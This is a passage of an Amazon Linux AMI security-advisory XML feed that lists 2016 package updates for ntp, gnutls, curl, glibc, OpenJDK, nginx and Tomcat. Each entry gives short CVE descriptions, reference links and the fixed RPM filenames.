arch="i686"><filename>Packages/kernel-tools-debuginfo-4.1.17-22.30.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.1.17" release="22.30.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.1.17-22.30.amzn1.i686.rpm</filename></package><package name="perf" version="4.1.17" release="22.30.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.1.17-22.30.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.1.17" release="22.30.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.1.17-22.30.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.1.17" release="22.30.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.1.17-22.30.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.1.17" release="22.30.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.1.17-22.30.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.1.17" release="22.30.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.1.17-22.30.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.1.17" release="22.30.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.1.17-22.30.amzn1.i686.rpm</filename></package><package name="kernel" version="4.1.17" release="22.30.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.1.17-22.30.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.1.17" release="22.30.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.1.17-22.30.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.1.17" release="22.30.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.1.17-22.30.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-649</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-649: important priority package update for ntp</title><issued date="2016-02-09 13:30:00" /><updated date="2016-10-18 12:15:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-4953:
ntpd in NTP 4.x before 4.2.8p8 allows remote attackers to cause a denial of service (ephemeral-association demobilization) by sending a spoofed crypto-NAK packet with incorrect authentication data at a certain time.
1340852:
CVE-2016-4953 ntp: bad authentication demobilizes ephemeral associations
CVE-2015-8158:
1300273:
CVE-2015-8158 ntp: potential infinite loop in ntpq
CVE-2015-8138:
It was discovered that ntpd as a client did not correctly check the originate timestamp in received packets. A remote attacker could use this flaw to send a crafted packet to an ntpd client that would effectively disable synchronization with the server, or push arbitrary offset/delay measurements to modify the time on the client.
1299442:
CVE-2015-8138 ntp: missing check for zero originate timestamp
CVE-2015-7979:
1300271:
CVE-2015-7979 ntp: off-path denial of service on authenticated broadcast mode
CVE-2015-7978:
1300270:
CVE-2015-7978 ntp: stack exhaustion in recursive traversal of restriction list
CVE-2015-7977:
1300269:
CVE-2015-7977 ntp: restriction list NULL pointer dereference
CVE-2015-7974:
NTP 4.x before 4.2.8p6 and 4.3.x before 4.3.90 do not verify peer associations of symmetric keys when authenticating packets, which might allow remote attackers to conduct impersonation attacks via an arbitrary trusted key, aka a &quot;skeleton key.&quot;
1297471:
CVE-2015-7974 ntp: missing key check allows impersonation between authenticated peers (VU#357792)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7974" title="" id="CVE-2015-7974" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7977" title="" id="CVE-2015-7977" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7978" title="" id="CVE-2015-7978" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7979" title="" id="CVE-2015-7979" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8138" title="" id="CVE-2015-8138" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8158" title="" id="CVE-2015-8158" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4953" title="" id="CVE-2016-4953" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ntpdate" version="4.2.6p5" release="36.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntpdate-4.2.6p5-36.29.amzn1.x86_64.rpm</filename></package><package name="ntp" version="4.2.6p5" release="36.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-4.2.6p5-36.29.amzn1.x86_64.rpm</filename></package><package name="ntp-doc" version="4.2.6p5" release="36.29.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-doc-4.2.6p5-36.29.amzn1.noarch.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="36.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-debuginfo-4.2.6p5-36.29.amzn1.x86_64.rpm</filename></package><package name="ntp-perl" version="4.2.6p5" release="36.29.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-perl-4.2.6p5-36.29.amzn1.noarch.rpm</filename></package><package name="ntp" version="4.2.6p5" release="36.29.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-4.2.6p5-36.29.amzn1.i686.rpm</filename></package><package name="ntpdate" version="4.2.6p5" release="36.29.amzn1" epoch="0" arch="i686"><filename>Packages/ntpdate-4.2.6p5-36.29.amzn1.i686.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="36.29.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-debuginfo-4.2.6p5-36.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-650</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-650: medium priority package update for mod24_nss</title><issued date="2016-02-09 13:30:00" /><updated date="2016-02-09 13:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-5244:
1259216:
CVE-2015-5244 mod_nss: incorrect ciphersuite parsing
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5244" title="" id="CVE-2015-5244" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_nss" version="1.0.12" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_nss-1.0.12-1.21.amzn1.x86_64.rpm</filename></package><package name="mod24_nss-debuginfo" version="1.0.12" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_nss-debuginfo-1.0.12-1.21.amzn1.x86_64.rpm</filename></package><package name="mod24_nss-debuginfo" version="1.0.12" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_nss-debuginfo-1.0.12-1.21.amzn1.i686.rpm</filename></package><package name="mod24_nss" version="1.0.12" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_nss-1.0.12-1.21.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-651</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-651: medium priority package update for gnutls</title><issued date="2016-02-09 13:30:00" /><updated date="2016-02-09 13:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-7575:
A flaw was found in the way TLS 1.2 could use the MD5 hash function for signing ServerKeyExchange and Client Authentication packets during a TLS handshake. A man-in-the-middle attacker able to force a TLS connection to use the MD5 hash function could use this flaw to conduct collision attacks to impersonate a TLS server or an authenticated TLS client.
1289841:
CVE-2015-7575 TLS 1.2 Transcipt Collision attacks against MD5 in key exchange protocol (SLOTH)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7575" title="" id="CVE-2015-7575" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gnutls-guile" version="2.8.5" release="19.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-guile-2.8.5-19.15.amzn1.x86_64.rpm</filename></package><package name="gnutls-devel" version="2.8.5" release="19.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-devel-2.8.5-19.15.amzn1.x86_64.rpm</filename></package><package name="gnutls" version="2.8.5" release="19.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-2.8.5-19.15.amzn1.x86_64.rpm</filename></package><package name="gnutls-debuginfo" version="2.8.5" release="19.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-debuginfo-2.8.5-19.15.amzn1.x86_64.rpm</filename></package><package name="gnutls-utils" version="2.8.5" release="19.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-utils-2.8.5-19.15.amzn1.x86_64.rpm</filename></package><package name="gnutls-debuginfo" version="2.8.5" release="19.15.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-debuginfo-2.8.5-19.15.amzn1.i686.rpm</filename></package><package name="gnutls-guile" version="2.8.5" release="19.15.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-guile-2.8.5-19.15.amzn1.i686.rpm</filename></package><package name="gnutls" version="2.8.5" release="19.15.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-2.8.5-19.15.amzn1.i686.rpm</filename></package><package name="gnutls-utils" version="2.8.5" release="19.15.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-utils-2.8.5-19.15.amzn1.i686.rpm</filename></package><package name="gnutls-devel" version="2.8.5" release="19.15.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-devel-2.8.5-19.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-652</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-652: low priority package update for curl</title><issued date="2016-02-09 13:30:00" /><updated date="2016-02-09 13:30:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-0755:
The ConnectionExists function in lib/url.c in libcurl before 7.47.0 does not properly re-use NTLM-authenticated proxy connections, which might allow remote attackers to authenticate as other users via a request, a similar issue to CVE-2014-0015.
1302263:
CVE-2016-0755 curl: NTLM credentials not-checked for proxy connection re-use
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0755" title="" id="CVE-2016-0755" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libcurl-devel" version="7.40.0" release="8.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.40.0-8.54.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.40.0" release="8.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.40.0-8.54.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.40.0" release="8.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.40.0-8.54.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.40.0" release="8.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.40.0-8.54.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.40.0" release="8.54.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.40.0-8.54.amzn1.i686.rpm</filename></package><package name="curl" version="7.40.0" release="8.54.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.40.0-8.54.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.40.0" release="8.54.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.40.0-8.54.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.40.0" release="8.54.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.40.0-8.54.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-653</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-653: critical priority package update for glibc</title><issued date="2016-02-16 06:00:00" /><updated date="2016-02-16 06:45:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-7547:
A stack-based buffer overflow flaw was found in the send_dg() and send_vc() functions, used by getaddrinfo() and other higher-level interfaces of glibc. A remote attacker able to cause an application to call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7547" title="" id="CVE-2015-7547" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glibc-devel" version="2.17" release="106.166.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.17-106.166.amzn1.x86_64.rpm</filename></package><package name="glibc-utils" version="2.17" release="106.166.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.17-106.166.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.17" release="106.166.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.17-106.166.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="106.166.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.17-106.166.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="106.166.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.17-106.166.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="106.166.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.17-106.166.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.17" release="106.166.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.17-106.166.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.17" release="106.166.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.17-106.166.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.17" release="106.166.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.17-106.166.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.17" release="106.166.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.17-106.166.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="106.166.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.17-106.166.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="106.166.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.17-106.166.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.17" release="106.166.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.17-106.166.amzn1.i686.rpm</filename></package><package name="glibc" version="2.17" release="106.166.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.17-106.166.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.17" release="106.166.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.17-106.166.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.17" release="106.166.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.17-106.166.amzn1.i686.rpm</filename></package><package name="nscd" version="2.17" release="106.166.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.17-106.166.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.17" release="106.166.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.17-106.166.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-654</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-654: important priority package update for java-1.6.0-openjdk</title><issued date="2016-02-19 15:48:00" /><updated date="2016-02-19 15:48:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-0494:
An integer signedness issue was found in the font parsing code in the 2D component in OpenJDK. A specially crafted font file could possibly cause the Java Virtual Machine to execute arbitrary code, allowing an untrusted Java application or applet to bypass Java sandbox restrictions.
CVE-2016-0483:
An out-of-bounds write flaw was found in the JPEG image format decoder in the AWT component in OpenJDK. A specially crafted JPEG image could cause a Java application to crash or, possibly execute arbitrary code. An untrusted Java application or applet could use this flaw to bypass Java sandbox restrictions.
CVE-2016-0466:
It was discovered that the JAXP component in OpenJDK did not properly enforce the totalEntitySizeLimit limit. An attacker able to make a Java application process a specially crafted XML file could use this flaw to make the application consume an excessive amount of memory.
CVE-2016-0448:
Multiple flaws were discovered in the Networking and JMX components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2016-0402:
Multiple flaws were discovered in the Networking and JMX components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0402" title="" id="CVE-2016-0402" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0448" title="" id="CVE-2016-0448" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0466" title="" id="CVE-2016-0466" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0483" title="" id="CVE-2016-0483" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0494" title="" id="CVE-2016-0494" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2016:0067.html" title="" id="RHSA-2016:0067" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.6.0-openjdk" version="1.6.0.38" release="1.13.10.0.73.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.38-1.13.10.0.73.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.38" release="1.13.10.0.73.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.38-1.13.10.0.73.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.38" release="1.13.10.0.73.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.38-1.13.10.0.73.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.38" release="1.13.10.0.73.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.38-1.13.10.0.73.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.38" release="1.13.10.0.73.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.38-1.13.10.0.73.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.38" release="1.13.10.0.73.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.38-1.13.10.0.73.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.38" release="1.13.10.0.73.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.38-1.13.10.0.73.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.38" release="1.13.10.0.73.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.38-1.13.10.0.73.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.38" release="1.13.10.0.73.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.38-1.13.10.0.73.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.38" release="1.13.10.0.73.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.38-1.13.10.0.73.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.38" release="1.13.10.0.73.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.38-1.13.10.0.73.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.38" release="1.13.10.0.73.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.38-1.13.10.0.73.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-655</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-655: medium priority package update for nginx</title><issued date="2016-02-19 15:50:00" /><updated date="2016-02-19 15:50:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-0747:
It was discovered that nginx did not limit recursion when resolving CNAME DNS records. An attacker able to manipulate DNS responses received by nginx could use this flaw to cause a worker process to use an excessive amount of resources if nginx enabled the resolver in its configuration.
1302589:
CVE-2016-0747 nginx: Insufficient limits of CNAME resolution in resolver
CVE-2016-0746:
A use-after-free flaw was found in the way nginx resolved certain CNAME DNS records. An attacker able to manipulate DNS responses received by nginx could use this flaw to cause a worker process to crash or, possibly, execute arbitrary code if nginx enabled the resolver in its configuration.
1302588:
CVE-2016-0746 nginx: use-after-free during CNAME response processing in resolver
CVE-2016-0742:
It was discovered that nginx could perform an out of bound read and dereference an invalid pointer when resolving CNAME DNS records. An attacker able to manipulate DNS responses received by nginx could use this flaw to cause a worker process to crash if nginx enabled the resolver in its configuration.
1302587:
CVE-2016-0742 nginx: invalid pointer dereference in resolver
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0742" title="" id="CVE-2016-0742" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0746" title="" id="CVE-2016-0746" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0747" title="" id="CVE-2016-0747" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nginx-debuginfo" version="1.8.1" release="1.26.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-debuginfo-1.8.1-1.26.amzn1.x86_64.rpm</filename></package><package name="nginx" version="1.8.1" release="1.26.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-1.8.1-1.26.amzn1.x86_64.rpm</filename></package><package name="nginx" version="1.8.1" release="1.26.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-1.8.1-1.26.amzn1.i686.rpm</filename></package><package name="nginx-debuginfo" version="1.8.1" release="1.26.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-debuginfo-1.8.1-1.26.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-656</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-656: medium priority package update for tomcat6</title><issued date="2016-03-10 16:30:00" /><updated date="2016-03-10 16:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-7810:
It was found that the expression language resolver evaluated expressions within a privileged code section. A malicious web application could use this flaw to bypass security manager protections.
1222573:
CVE-2014-7810 Tomcat/JbossWeb: security manager bypass via EL expressions
CVE-2014-0230:
It was found that Tomcat would keep connections open after processing requests with a large enough request body. A remote attacker could potentially use this flaw to exhaust the pool of available connections and preventing further, legitimate connections to the Tomcat server to be made.
1191200:
CVE-2014-0230 tomcat: non-persistent DoS attack by feeding data by aborting an upload
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0230" title="" id="CVE-2014-0230" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7810" title="" id="CVE-2014-7810" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat6-el-2.1-api" version="6.0.44" release="1.3.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-el-2.1-api-6.0.44-1.3.amzn1.noarch.rpm</filename></package><package name="tomcat6" version="6.0.44" release="1.3.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-6.0.44-1.3.amzn1.noarch.rpm</filename></package><package name="tomcat6-lib" version="6.0.44" release="1.3.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-lib-6.0.44-1.3.amzn1.noarch.rpm</filename></package><package name="tomcat6-servlet-2.5-api" version="6.0.44" release="1.3.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-servlet-2.5-api-6.0.44-1.3.amzn1.noarch.rpm</filename></package><package name="tomcat6-admin-webapps" version="6.0.44" release="1.3.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-admin-webapps-6.0.44-1.3.amzn1.noarch.rpm</filename></package><package name="tomcat6-javadoc" version="6.0.44" release="1.3.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-javadoc-6.0.44-1.3.amzn1.noarch.rpm</filename></package><package name="tomcat6-jsp-2.1-api" version="6.0.44" release="1.3.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-jsp-2.1-api-6.0.44-1.3.amzn1.noarch.rpm</filename></package><package name="tomcat6-webapps" version="6.0.44" release="1.3.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-webapps-6.0.44-1.3.amzn1.noarch.rpm</filename></package><package name="tomcat6-docs-webapp" version="6.0.44" release="1.3.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-docs-webapp-6.0.44-1.3.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-657</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-657: medium priority package update for tomcat7</title><issued date="2016-03-10 16:30:00" /><updated date="2016-03-10 16:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-5346:
Session fixation vulnerability in Apache Tomcat 7.x before 7.0.66, 8.x before 8.0.30, and 9.x before 9.0.0.M2, when different session settings are used for deployments of multiple versions of the same web application, might allow remote attackers to hijack web sessions by leveraging use of a requestedSessionSSL field for an unintended request, related to CoyoteAdapter.java and Request.java.
1311085:
CVE-2015-5346 tomcat: Session fixation
CVE-2015-5174:
Directory traversal vulnerability in RequestUtil.java in Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.65, and 8.x before 8.0.27 allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application in a getResource, getResourceAsStream, or getResourcePaths call, as demonstrated by the $CATALINA_BASE/webapps directory.
1265698:
CVE-2015-5174 tomcat: URL Normalization issue
CVE-2014-7810:
It was found that the expression language resolver evaluated expressions within a privileged code section. A malicious web application could use this flaw to bypass security manager protections.
1222573:
CVE-2014-7810 Tomcat/JbossWeb: security manager bypass via EL expressions
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7810" title="" id="CVE-2014-7810" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5174" title="" id="CVE-2015-5174" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5346" title="" id="CVE-2015-5346" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7-el-2.2-api" version="7.0.67" release="1.13.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.67-1.13.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.67" release="1.13.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.67-1.13.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.67" release="1.13.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.67-1.13.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.67" release="1.13.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.67-1.13.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.67" release="1.13.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.67-1.13.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.67" release="1.13.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.67-1.13.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.67" release="1.13.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.67-1.13.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.67" release="1.13.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.67-1.13.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.67" release="1.13.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.67-1.13.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.67" release="1.13.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.67-1.13.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 